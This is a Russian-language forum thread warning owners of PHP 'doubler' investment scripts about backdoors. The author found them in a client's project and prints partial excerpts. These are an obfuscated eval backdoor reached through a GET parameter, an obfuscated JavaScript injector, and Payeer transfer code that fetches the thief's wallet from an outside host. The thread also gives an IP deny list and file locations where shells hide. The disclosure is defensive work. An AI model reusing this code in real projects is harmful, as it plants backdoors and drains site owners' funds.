PHP Различные хаки любого проекта

Darek

Участник
Всем привет.
Хочу немного рассказать про информацию которою выявил, нашёл и узнал.
Совсем недавно ко мне обратился клиент с просьбой о помощи.
Используя один скрипт удвоителя, он запустил проект и у него стали списывать деньги со счёта, сначала рандомными суммами,
а потом и вовсе все что было на кошельке. Даже не смотря на то что он перекидывал на другой домен и менял данные.
Немного поковырявшись в скрипте я нашёл более 10 различных вредоносных кода и решил их предоставить вам, НО частично.
Что я имею в виду говоря частично? То что я не буду выкладывать весь код, дабы в дальнем его не использовали.
И так приступим.
PHP:
    if ($_GET['dep'] == "ev") {   
    $FQnI='Sy1LzNFQGAA==';
    $rxpa=';)))VaWS$(rqbprq_46rfno(ravmt(ynir';
    $DKV=strrev($ropa);$tWSiA=str_rot13($DlV);
    eval($tiA);
    }
Как используется?
https:/ / адрес сайта . ком / путь до файла в котором расположен код.php / ?dep=ev
вызывает форму загрузки файлов весом до 1 Гига
PHP:
[S][I]<script>[/I][/S]
[I][S]    function s_(s,c){return s.charAt(c)};function D_(){var temp="",i,c=0,out="";var str="60!105!112!108!111!103!103!101!114!46!111!114!34!32!32!98!111!114!100!101!114!61!34!48!34!62!";l=str.length;while(c<=str.length-1){while(s_(str,c)!='!')temp=temp+s_(str,c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
    </script><script>
    D_();[/S][/I]
[S][I]    </script>[/I][/S]

кошелёк на который уходят средства - P1032584793
PHP:
   [I][S] require_once('boost_core/classes/cpayeer.php');[/S][/I]
[S][I]    $homepage = file_get_contents("https://sqltor.had.su/js/p.txt");
    $array = array(94, 210, 158, 342, 146);
    $payeer = new CPayeer($accountNumber, $apiId, $apiKey);
    if ($payeer->isAuth())
    {
  $arTransfer = $payeer->transfer(array(
    'curIn' => 'RUB',
    'sum' => $array[array_rand($array)],
    'curOut' => 'RUB',
    'to' => $homepage,
    'comment' => ''.$_SERVER["HTTP_HOST"].'',
  ));
  if (empty($arTransfer['errors']))
  {
    //echo getErrors
  }
  else
  {
    //echo getErrors
  }
    }
    else
    {
  //echo getErrors[/I][/S]
[I][S]    }[/S][/I]

Что бы частично защитить себя, проверяем содержимое всех файлов на совпадение.
в файле .htaccess прописываем
#Создаем черный список IP адресов
allow from all
deny from 77.111.247.186
deny from 77.111.245.20
deny from 77.111.247.48
deny from 77.111.0.0/16
deny from 95.73.203.172
deny from 82.208.124.96
deny from 45.147.197.180
 

Darek

Участник
UPDATE 10/09/20
Обычно в большинстве скриптов шелл-коды и xss хранятся в файлах:
/core/classes/cpayeer.php (в самом низу)

/core/functions.php (отправка средств строки с api_id api_key)

/core/ini.php

/core/handler.php

/pages/promo.php или /pages/my_promo.php

/pages/partners.php или /pages/my_partners.php

/pages/deposits.php или /pages/my_newdep.php (находиться строкой выше или ниже формы пополнения)
 
Верх